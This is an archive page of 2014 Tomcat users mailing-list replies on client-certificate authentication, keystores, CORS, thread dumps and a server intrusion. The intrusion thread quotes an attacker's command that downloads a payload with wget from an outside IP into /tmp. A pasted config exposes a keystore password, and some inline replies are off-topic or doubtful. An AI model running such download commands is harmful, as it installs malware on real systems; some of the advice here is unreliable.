RE: Regarding i think an intrusion
Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello Chris, but this logfile was only one day. MGAy Caramba! Maybe i had a concept mismatch trying to capture the exact moment when the execution begins. My command was while [ true ]; do CUENTO=$(ps -fea | grep wget | grep -v grep | grep -v 127.0.0.1 | wc -l); if [ $CUENTO -gt 0 ] ; then PIDJAVA=$(ps -fea | grep java | grep -v grep | awk '{ print $2 }'); echo -e Se encontro wget corriendo, sacando dump de JVM... ; kill -3 $PIDJAVA; fi; sleep 3; done Maybe too many dumps all togheter, now im trying to get a live capture without luck =( If you know a better method, please letme know it. Thanks for your effort, knid regards, Leonardo Saludos.- Leonardo Santagostini MGTomcat APR no puede utilizar WebSockets con JDK 1.6 ...necesita utilizar JDK @ 1.7 (ahora) MGesto ContainerBackgroundProcessor[StandardEngine[Catalina]] daemon prio=10 tid=0x52867800 nid=0x2550 waiting on condition [0x4105e000] java.lang.Thread.State: TIMED_WAITING (sleeping) at java.lang.Thread.sleep(Native Method) at org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor.run(ContainerBase.java:1508) at java.lang.Thread.run(Thread.java:662) MGEstos registros informativos producen MUCHO ruido MGlog4j.properties MGlog4j.logger.org.quartz=OFF //(Callate Quartz) MGeso ajp-bio-8009-exec-37 daemon prio=10 tid=0x2aaac07fd800 nid=0x2656 runnable [0x46f34000] java.lang.Thread.State: RUNNABLE at java.util.regex.Pattern$6.isSatisfiedBy(Pattern.java:4763) at java.util.regex.Pattern$CharProperty.match(Pattern.java:3345) at java.util.regex.Pattern$Curly.match0(Pattern.java:3770) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at java.util.regex.Pattern$GroupTail.match(Pattern.java:4227) at java.util.regex.Pattern$Curly.match0(Pattern.java:3782) at java.util.regex.Pattern$Curly.match(Pattern.java:3744) at java.util.regex.Pattern$GroupHead.match(Pattern.java:4168) at java.util.regex.Pattern$Loop.match(Pattern.java:4295) at
RE: Configuration of auth-constraint ?
Date: Sun, 4 May 2014 12:42:04 +0530 Subject: Configuration of auth-constraint ? From: motgu...@gmail.com To: users@tomcat.apache.org I am using client certificates in my application. Here is the configuration i did Step1:- Added below snippet in tomcat-users.xml file role rolename=certrole/ user username=ignoreAndCheckInWebApp password=nopass roles=certrole/ Step 2:- Added below sniipet in web.xml security-constraint web-resource-collection web-resource-nameClient Certificate Auth/web-resource-name url-pattern/MyClientAuthenticator.jsp/url-pattern /web-resource-collection auth-constraint role-namecertrole/role-name /auth-constraint /security-constraint login-config auth-methodCLIENT-CERT/auth-method /login-config placed a jar file conatining MySSlAuthentication.java into the lib folder of Tomcat. Step3:- Then added below valve element under tomcat\conf\context.xml Valve className=MySSlAuthentication/ So its more or less th eprocedure mentioned at http://twoguysarguing.wordpress.com/2009/11/03/mutual-authentication-with-client-cert-tomcat-6-and-httpclient/ My understanding when browser tries to call the MyClientAuthenticator.jsp, server asks the client certificate from browser. But why do we need two entries * role rolename=certrole/ * *user username=ignoreAndCheckInWebApp password=nopass roles=certrole/ *under tomcat-users.xml and what is the use of below entry ? *auth-constraint* * role-namecertrole/role-name* * /auth-constraint* MG for the URL presented at /MyClientAuthenticator.jsp url-pattern/MyClientAuthenticator.jsp/url-pattern /web-resource-collection auth-constraint MGThe role from tomcat-users.xml defined as 'certrole' role-namecertrole/role-name /auth-constraint /security-constraint login-config MGwould be authenticated (based on the contents of the presented Client Cert) auth-methodCLIENT-CERT/auth-method /login-config MGMakes Sense?
RE: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails
Date: Sat, 3 May 2014 19:31:17 -0400 Subject: Tomcat7 Client Certicate Authentication Using Datasource Realm Fails From: dhayamoorthi2...@gmail.com To: users@tomcat.apache.org Hi, In Tomcat7, we are trying to do client certificate authentication using datasource realm. But it fails. Please fnd the configuration below: server.xml: ?xml version=1.0 encoding=UTF-8 standalone=no ? Server port=8005 shutdown=SHUTDOWNListener SSLEngine=on className=org.apache.catalina.core.AprLifecycleListener/ Listener className=org.apache.catalina.core.JasperListener/ Listener className=org.apache.catalina.core.JreMemoryLeakPreventionListener/ Listener className=org.apache.catalina.mbeans.GlobalResourcesLifecycleListener/ Listener className=org.apache.catalina.core.ThreadLocalLeakPreventionListener/ !-- GlobalNamingResourcesResource auth=Container description=User database that can be updated and saved factory=org.apache.catalina.users.MemoryUserDatabaseFactory name=UserDatabase pathname=conf/tomcat-users.xml type=org.apache.catalina.UserDatabase/ /GlobalNamingResources -- Service name=Catalina Connector SSLEnabled=true clientAuth=true connectionTimeout=1 keyAlias=masfed_server_dit keystoreFile=/opt/ADP/keystores/masfed_server_dit.jks keystorePass=sso@di maxThreads=150 port=8443 protocol=org.apache.coyote.http11.Http11Protocol scheme=https secure=true server=Server sslProtocol=TLS truststorefile=/opt/ADP/keystores/masfed_server_dit.jks truststorepass=sso@di enablelookups=false/ Connector port=8009 protocol=AJP/1.3 redirectPort=8443/ Engine defaultHost=localhost name=Catalina !-- Realm className=org.apache.catalina.realm.MemoryRealm resourceName=UserDatabase/ -- !-- Realm className=org.apache.catalina.realm.LockOutRealmRealm className=org.apache.catalina.realm.UserDatabaseRealm resourceName=UserDatabase/ /Realm -- GlobalNamingResources Realm className=org.apache.catalina.realm.DataSourceRealm dataSourceName=jdbc/FederationDS userTable=T_USER userNameCol=USERNAME userCredCol=PASSWORD userRoleTable=T_USER_ROLES roleNameCol=ROLENAME debug=99 allRolesMode=authOnly / /GlobalNamingResources Host appBase=webapps autoDeploy=true name=localhost unpackWARs=trueValve className=org.apache.catalina.valves.AccessLogValve directory=logs pattern=%h %l %u %t quot;%rquot; %s %b prefix=localhost_access_log. suffix=.txt/ /Host /Engine /Service /Server security role configuration tomcat_base/conf/web.xml: - security-role role-namemasFedClient/role-name /security-role security-constraint web-resource-collection web-resource-nameall/web-resource-name url-pattern/*/url-pattern /web-resource-collection auth-constraint role-namemasFedClient/role-name /auth-constraint user-data-constraint transport-guaranteeCONFIDENTIAL/transport-guarantee /user-data-constraint /security-constraint login-config auth-methodCLIENT-CERT/auth-method !-- realm-nametomcat-users/realm-name -- realm-namejdbc/FederationDS/realm-name /login-config Database has all the required tables and columns. But authentication fails with the below mentioned error: FINE: Checking validity for '$' MGthis is an insane value..change it to something meaningful using [A-Z][O-9] characters MGbesides which your user_name length is WAY beyond the 15 byte allocation for the table create table T_USER ( user_name varchar(15) not null primary key, user_pass varchar(15) not null ); MG May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate FINE: Checking validity for 'CN=VeriSign Class 3 Extended Validation SSL SGC CA, OU=Terms of use at https://www.verisign.com/rpa (c)06, OU=VeriSign Trust Network, O=VeriSign, Inc., C=US' May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase authenticate FINE: Checking validity for 'CN=VeriSign Class 3 Public Primary Certification Authority - G5, OU=(c) 2006 VeriSign, Inc. - For authorized use only, OU=VeriSign Trust Network, O=VeriSign, Inc., C=US' May 03, 2014 7:16:29 PM org.apache.catalina.realm.RealmBase getPrincipal FINE: Got user name from X509 certificate: $$ May 03, 2014 7:16:29 PM org.apache.catalina.authenticator.AuthenticatorBase invoke FINE: Failed authenticate() test For security purpose, I had mad the certificate cn name as $$. MGcn is ROLE not the user_name MGhttps://tomcat.apache.org/tomcat-7.0-doc/realm-howto.html The error message does not tell why the authentication is failing. MGyes it does ..it cannot authenticate $$ Do I need to enable additional
RE: Reg: Issue in SSL Authentication in Tomcat after new client certificate has been created / added, Tomcat has to be started every time i add a new client certificate
Krishna Let me check with the engineers who want to work for you for free From: karip...@teksystems.com To: users@tomcat.apache.org Date: Fri, 2 May 2014 04:55:18 -0400 Subject: Reg: Issue in SSL Authentication in Tomcat after new client certificate has been created / added, Tomcat has to be started every time i add a new client certificate Hi, 1. We are using Tomcat 7.0.39 in our application. 2. We have implemented Two Way SSL authentication using java keytool 3. Issue is, when we create a new client certificate and add it to Java Keystore(.jks), we are unable to authenticate unless we restart the Tomcat. So, every time we add a new client certificate, we are restarting the Tomcat. Is there any way to handle this scenario with out restarting the Tomcat. I have read the document thoroughly, but i didn't get any information regarding this. Can you please help us on this. Thanks In advance. -- Thanks Regards, Krishna Chaitanya Aripaka | Consultant Cell: +91 92912 41123 | Work : +91 40 30113024 This electronic mail (including any attachments) may contain information that is privileged, confidential, and/or otherwise protected from disclosure to anyone other than its intended recipient(s). Any dissemination or use of this electronic mail or its contents (including any attachments) by persons other than the intended recipient(s) is strictly prohibited. If you have received this message in error, please notify us immediately by reply e-mail so that we may correct our internal records. Please then delete the original message (including any attachments) in its entirety. Thank you. - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: BLOCKED threads
Managing Provider Tokens Like the provider, the consumer must be responsible for managing the OAuth tokens. The necessary interface for managing the consumer tokens is OAuthConsumerTokenServices which are only accessible via factory method. Assuming that the consumer can leverage an active HTTP session, the default HttpSessionBasedTokenServices and HttpSessionBasedTokenServicesFactory should be adequate. so it appears that Spring is looking for an implmentor for OAuthConsumerTokenServices either HttpSessionBasedTokenServices OR HttpSessionBasedTokenServicesFactory http://spring-security-oauth.codehaus.org/oauth1.html#Managing_Provider_Tokens Martin Date: Fri, 2 May 2014 15:22:01 -0700 From: rallav...@gmail.com To: users@tomcat.apache.org Subject: BLOCKED threads All, Tomcat Version: 7.0.47 JVM Version: 1.7.0_51-b13 I see many blocked threads (90) in the thread dump. There are mainly two monitors that block 69 threads. One of them is below. It appears that it is simply trying to log. -- http-bio-28080-exec-396 daemon prio=10 tid=0x7fcbc814f000 nid=0x5804 runnable [0x7fcc2144d000] java.lang.Thread.State: RUNNABLE at java.lang.Throwable.getStackTraceElement(Native Method) at java.lang.Throwable.getOurStackTrace(Throwable.java:827) - locked 0x0007e1886340 (a java.util.NoSuchElementException) at java.lang.Throwable.printStackTrace(Throwable.java:656) - locked 0x0007e207a5a8 (a java.io.PrintWriter) at java.lang.Throwable.printStackTrace(Throwable.java:721) at java.util.logging.SimpleFormatter.format(SimpleFormatter.java:157) - locked 0x0007008187e8 (a java.util.logging.SimpleFormatter) at java.util.logging.StreamHandler.publish(StreamHandler.java:196) - locked 0x0007008187b0 (a java.util.logging.ConsoleHandler) at java.util.logging.ConsoleHandler.publish(ConsoleHandler.java:105) at java.util.logging.Logger.log(Logger.java:610) at java.util.logging.Logger.doLog(Logger.java:631) at java.util.logging.Logger.logp(Logger.java:831) at org.apache.juli.logging.DirectJDKLog.log(DirectJDKLog.java:185) at org.apache.juli.logging.DirectJDKLog.error(DirectJDKLog.java:151) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:260) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:123) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:502) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:100) at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:953) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:118) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1041) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:603) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:310) - locked 0x0007e0ba5dd8 (a org.apache.tomcat.util.net.SocketWrapper) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:744) -- The second one has the lock on StandardClassLoader. -- http-bio-28080-exec-605 daemon prio=10 tid=0x7fcbc82b8800 nid=0x77e6 runnable [0x7fcb919d6000] java.lang.Thread.State: RUNNABLE at java.lang.ClassLoader.findLoadedClass0(Native Method) at java.lang.ClassLoader.findLoadedClass(ClassLoader.java:1093) at java.lang.ClassLoader.loadClass(ClassLoader.java:407) - locked 0x000700810fc8 (a org.apache.catalina.loader.StandardClassLoader) at java.lang.ClassLoader.loadClass(ClassLoader.java:358) at java.util.ResourceBundle$Control.newBundle(ResourceBundle.java:2566) at java.util.ResourceBundle.loadBundle(ResourceBundle.java:1436) at java.util.ResourceBundle.findBundle(ResourceBundle.java:1400) at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354) at java.util.ResourceBundle.findBundle(ResourceBundle.java:1354) at
RE: OpenSSL and keytool misery
apparently the provided cert that came with your P12 is not a X509v3 cert assuming $1 is the root name of the PEM file openssl pkcs12 -in $1.p12 -out $1.pem -nodes -clcerts vi $1.pem and you should see something like: /snip Key Attributes X509v3 Key Usage: nn /snip please verify Martin Subject: Re: OpenSSL and keytool misery From: dmik...@gopivotal.com Date: Thu, 1 May 2014 08:53:10 -0700 To: users@tomcat.apache.org On May 1, 2014, at 7:56 AM, Christopher Schultz ch...@christopherschultz.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 All, I've been trying to convert an OpenSSL-generated key and certificate into a keystore for use with Tomcat. I had given up on this months ago and now I'm resuming my attempts. What I've done so far: 1. Created an RSA private key using openssl 2. Created a certificate request using openssl 3. Obtained a signed certificate from a CA 4. Attempted to combine my key and certificate into a PKCS12 file using openssl: $ openssl pkcs12 -export -in ${HOSTNAME}.crt \ -inkey ${HOSTNAME}.key ${HOSTNAME}.p12 5. Import the PKCS12 store into a Java keystore using keytool: $ keytool -importkeystore -srckeystore ${HOSTNAME}.p12 \ -destkeystore ${HOSTNAME}.jks -srcstoretype pkcs12 This is what my keytool now says is in the store: $ keytool -list -keystore conf/${HOSTNAME}.jks Enter keystore password: Keystore type: JKS Keystore provider: SUN Your keystore contains 1 entry 1, May 1, 2014, PrivateKeyEntry, Certificate fingerprint (MD5): EC:FE:0A:7F:12:3D:19:39:DD:82:7A:7D:F9:AE:18:9A I set the password for the Java keystore to changeit. Now, in Tomcat: Connector port=8443 protocol=org.apache.coyote.http11.Http11NioProtocol keystoreFile=${catalina.base}/conf/${HOSTNAME}.jks keystorePass=“changeit Have you tried setting keyAlias and keyPass? Dan URIEncoding=UTF-8 sslProtocol=SSL SSLEnabled=true scheme=https secure=true / (Note that ${HOSTNAME}.jks has been expanded in my actual server.xml file.) Here's what happens when I launch Tomcat: org.apache.catalina.LifecycleException: Failed to initialize component [Connector[org.apache.coyote.http11.Http11NioProtocol-8443]] at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:106) at org.apache.catalina.core.StandardService.initInternal(StandardService.java:5 59) at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102) at org.apache.catalina.core.StandardServer.initInternal(StandardServer.java:813 ) at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102) at org.apache.catalina.startup.Catalina.load(Catalina.java:638) at org.apache.catalina.startup.Catalina.load(Catalina.java:663) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39 ) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl .java:25) at java.lang.reflect.Method.invoke(Method.java:597) at org.apache.catalina.startup.Bootstrap.load(Bootstrap.java:280) at org.apache.catalina.startup.Bootstrap.main(Bootstrap.java:454) Caused by: org.apache.catalina.LifecycleException: Protocol handler initialization failed at org.apache.catalina.connector.Connector.initInternal(Connector.java:980) at org.apache.catalina.util.LifecycleBase.init(LifecycleBase.java:102) ... 12 more Caused by: java.security.UnrecoverableKeyException: Cannot recover key at sun.security.provider.KeyProtector.recover(KeyProtector.java:311) at sun.security.provider.JavaKeyStore.engineGetKey(JavaKeyStore.java:121) at sun.security.provider.JavaKeyStore$JKS.engineGetKey(JavaKeyStore.java:38) at java.security.KeyStore.getKey(KeyStore.java:763) at com.sun.net.ssl.internal.ssl.SunX509KeyManagerImpl.init(SunX509KeyManagerImpl.java:113) at com.sun.net.ssl.internal.ssl.KeyManagerFactoryImpl$SunX509.engineInit(KeyMan agerFactoryImpl.java:48) at javax.net.ssl.KeyManagerFactory.init(KeyManagerFactory.java:239) at org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketF actory.java:560) at org.apache.tomcat.util.net.jsse.JSSESocketFactory.getKeyManagers(JSSESocketF actory.java:489) at org.apache.tomcat.util.net.NioEndpoint.bind(NioEndpoint.java:493) at org.apache.tomcat.util.net.AbstractEndpoint.init(AbstractEndpoint.java:640) at org.apache.coyote.AbstractProtocol.init(AbstractProtocol.java:434) at org.apache.coyote.http11.AbstractHttp11JsseProtocol.init(AbstractHttp11JsseP rotocol.java:119) at
RE: Regarding i think an intrusion
Date: Wed, 30 Apr 2014 12:35:52 -0300 Subject: Re: Regarding i think an intrusion From: lsantagost...@gmail.com To: users@tomcat.apache.org Hello list, well my homework is done Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij MGPor favor, pegue el contenido de los siguientes archivos de registros en Pastebin y enviarnos link: -rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt -rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log -rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat 43M Apr 30 12:18 portal-ht.log-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log-rw-rw-r-- 1 tomcat tomcat 58M Apr 30 12:19 portal-pdi.log-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log -rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log -rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt MGSaludos Cordiales desde EEUU Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet --- FW --nat--Haproxy (1)--Apache(2)-- mod_jk (3)--Haproxy(4)-- Tomcat7(5) -- haproxy(6) --Tomcat(7) Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version 1.6.0_41 Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini lsantagost...@gmail.com: Ok, i will do the following: 1) thread dump of running tomcat instance 2) Pastebin the running tomcat config I think at mid day will have all the info. Thanks all for replying me and all the responses. Regards, Leonardo Saludos.- Leonardo Santagostini http://ar.linkedin.com/in/santagostini 2014-04-30 10:55 GMT-03:00 Christopher Schultz ch...@christopherschultz.net: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Konstantin, On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini lsantagost...@gmail.com: Hello Dan, Nop, the attacker is executing locally the following tomcat8882 1 0 Apr27 ?00:00:00 sh /tmp/4.sh tomcat8893 8882 0 Apr27 ?00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid And the launch squid who tries to connect via ssh to varoius places. Right now its time to leave the office, but in a few hours i will paste in pastebin access logs, config files, wherever you tell me. This is my pstree [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd ├─java─┬─sh───wget │ └─263*[{java}] sh launched by tomcat's java? Yes: please verify that it's the JVM running Tomcat, and not just any JVM process. Take a thread dump: https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F It shall show what is stacktrace in thread that launched external process. +1 The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly-secured it. A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly
RE: Setup Issue tomcat 6 SLES 11 SSL
Date: Wed, 30 Apr 2014 14:01:11 -0500 From: tere...@tmbsw.com To: users@tomcat.apache.org Subject: Re: Setup Issue tomcat 6 SLES 11 SSL On 4/30/2014 9:02 AM, Christopher Schultz wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Vincent, On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote: I have setup tomcat 6 on SLES 11 and secured the instance with an external certificate if authority. The following is occurring from the same machine using both IE and Firefox: http://servername.wooster.edu:8080works for both IE11 and Firefox 29 and displays the index.html https://servername.wooster.edu:8443 works for Firefox 29 and displays the index.html https://servername.wooster.edu:8443 does not work for IE11v displays This page can't be displayed I have changed the logging level to finest and do not see any errors in the catalina.out. Thoughts? I have the same setup on another server and I believe the files and permission levels are set the same. What does your SSL configuration look like? You could also use either sslscan from the CLI or go to https://www.ssllabs.com/ssltest/ and use their online tool to examine the site from the outside. Perhaps you have a combination of protocols and ciphers that MSIE can't handle. - -chris If the option is available, you might also try disabling the IE friendly error messages. I'm not sure about IE 11, but it seems like previous versions displayed an error message with a reddish background if they were unable to authenticate a server with a given SSL certificate. Was a certificate authority bundle supplied with the SSL certificate? If so, is it installed and configured? Were the SSL certificates on the both servers issued by the same company? -Terence Bandoian MGIE / Internet Options / Tools / Content / Certificates / Import MGImport the provided certficate into CA Trusted Root - To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For additional commands, e-mail: users-h...@tomcat.apache.org
RE: CORS issue with Tomcat and Android Webview
Date: Sat, 26 Apr 2014 11:43:05 +0530 Subject: Re: CORS issue with Tomcat and Android Webview From: ankising...@gmail.com To: users@tomcat.apache.org On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian tere...@tmbsw.comwrote: On 4/24/2014 11:16 PM, Ankit Singhal wrote: Hi I did more research on this and figure out the issue.If you see the headers from Android and look into Origin Header. Origin: file:// Tomcat CORS filter tries to validate the URI in Origin header and considers file:// as an invalid URI and returns back 403. I have applied accept-origin*/accept-origin params. So shouldn't CORS filter honor this ? I agree that Client also has the problem , but still server should also allow... Hi, Ankit- Have you tried disabling or removing the CORS filter when you're testing from the Android device? The flowchart in the Tomcat CORS documentation indicates that the filter will attempt to validate the origin before it determines whether or not it is allowed. Apparently, the file scheme is not considered valid. MGreferencing the request processing flowchart at MGhttps://tomcat.apache.org/tomcat-7.0-doc/images/cors-flowchart.png MGyou will need to carefully shepherd your request thru TC Valve/Filter/ServletProcessing gauntlet MGdid you supply a valid origin header? MGhttp://en.wikipedia.org/wiki/List_of_HTTP_header_fields MGdid you supply a valid request method e.g. POST/GET? MGAndroid is a much diffferent User-agent than Browser and you will need to set the request headers properly MGHttpConnection httpConn = null; try { // Open an HTTP Connection object httpConn = (HttpConnection)Connector.open(http://LOCALHOST:8080/services/getdata); // Setup HTTP Request to POST httpConn.setRequestMethod(HttpConnection.POST); httpConn.setRequestProperty(User-Agent, ???); http://www.useragentstring.com/pages/Mobile%20Browserlist/ MG Hope that helps. -Terence Bandoian On Fri, Apr 25, 2014 at 1:36 AM, Terence M. Bandoian tere...@tmbsw.com wrote: On 4/24/2014 1:14 PM, Jose María Zaragoza wrote: 2014-04-24 19:00 GMT+02:00 Terence M. Bandoian tere...@tmbsw.com: On 4/22/2014 1:37 PM, Jose María Zaragoza wrote: -- Forwarded message -- From: Terence M. Bandoian tere...@tmbsw.com Date: 2014-04-22 20:12 GMT+02:00 Subject: Re: CORS issue with Tomcat and Android Webview To: Tomcat Users List users@tomcat.apache.org On 4/22/2014 11:03 AM, Ankit Singhal wrote: Also we tried to give the same call from Android App to some different Node server and things worked fine. So it seems some problem with Tomcat only. A silly question: What does it have to do Tomcat's CORS support with W3C Widget Access specification ? I have no idea about Phonegap but it looks like that it prefers to follow that specification for managing requests to different domains , right ? Hi, Jose- The request/response headers in the original post were difficult for me to follow but basically, requests to Tomcat are successful when tested with Chrome (desktop? laptop? server? same as Tomcat?) and unsuccessful when tested from an Android device. What are the differences between the two environments? Do those differences have any effect on request processing by the Tomcat CORS filter? If it were me, I'd find out. Well , I have no idea, but according this page http://www.html5rocks.com/en/tutorials/cors/ if Content-Type is application/json , then request is a not simple request ( sic. ) and it requires a OPTIONS preflight request ( including Origin header) And Once the preflight request gives permissions, the browser makes the actual request First case (Chrome browser) did but, but the second didn't Are you test to change the Content-Type ? Regards Hi, Jose- From the page you cited: The use-case for CORS is simple. Imagine the site alice.com has some data that the site bob.com wants to access. This type of request traditionally wouldn’t be allowed under the browser’s same origin policy. However, by supporting CORS requests, alice.com can add a few special response headers that allows bob.com to access the data. In this case, alice.com would be the server that hosts Tomcat. As you suggest, the problem may very well be in the client but - FOR ME - it's worth the effort to understand what should happen on both the client and the server and to ensure that both are configured correctly. -Terence Bandoian On Tue, Apr 22, 2014 at 9:22 PM, Ankit Singhal ankising...@gmail.comwrote: Hi All I am facing a strange problem with Tomcat 8 and CORS. I am developing a Hybrid web app using ionicframework, AngularJS, Cordova as front end and Tomcat 8 and Spring 3 as back-end. For easy development I am testing the
RE: CORS issue with Tomcat and Android Webview
